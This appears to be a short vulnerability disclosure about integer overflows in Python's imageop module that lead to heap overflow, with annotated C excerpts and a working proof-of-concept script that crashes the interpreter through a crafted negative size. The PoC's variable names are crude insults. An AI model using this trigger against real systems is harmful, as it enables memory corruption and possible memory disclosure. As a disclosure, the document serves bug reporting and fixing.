The module imageop contains a lots of int overflow, which result in heap overflow, and maybe memory dump.<br>
The files imageop.c and rbgimgmodule.c are examples.<br><br><br>static PyObject *<br>imageop_tovideo(PyObject *self, PyObject *args)<br>{<br> int maxx, maxy, x, y, len;<br> <br> ........................<br><br> /* *************** int overflow here permit to bypass len check ******************* */
<br><br> if ( maxx*maxy*width != len ) {<br> PyErr_SetString(ImageopError, "String has incorrect length");<br> return 0;<br> }<br> <br> rv = PyString_FromStringAndSize(NULL, len);<br> if ( rv == 0 )
<br> return 0;<br> ncp = (unsigned char *)PyString_AsString(rv);<br><br> if ( width == 1 ) {<br> memcpy(ncp, cp, maxx); /* Copy first line */<br> ncp += maxx;<br><br>/* ********** with a negativ value it's possible to bypass the code ********** */
<br><br> for (y=1; y<maxy; y++) { /* Interpolate other lines */<br> <br><br><br>-----------------------------------------------------------------------------------------------------------------------------
<br><br>an IA 32 bits Proof of Concept:<br>*****************************************************************<br>import imageop<br><br>sexshit = "a"*1603<br>evil = "p"*5241<br>connard = "s"*2000
<br>supaire= "45"*65<br>print supaire<br>connard = "cool"<br>salope = "suceuse"<br>dtc = imageop.tovideo(sexshit,1,4461,-2147002257)<br>sexshit = "dtc"*52<br>print connard,supaire," fin de dump"
<br><br>**********************************************************************<br><br>www@AtlanticDrive:~$ python sux.py<br>4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
<br>cool 4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545 fin de dump<br>*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
<br>Abandon<br>www@AtlanticDrive:~$<br><br>ok, i hate the python's syntax, that's too old school ! :p<br>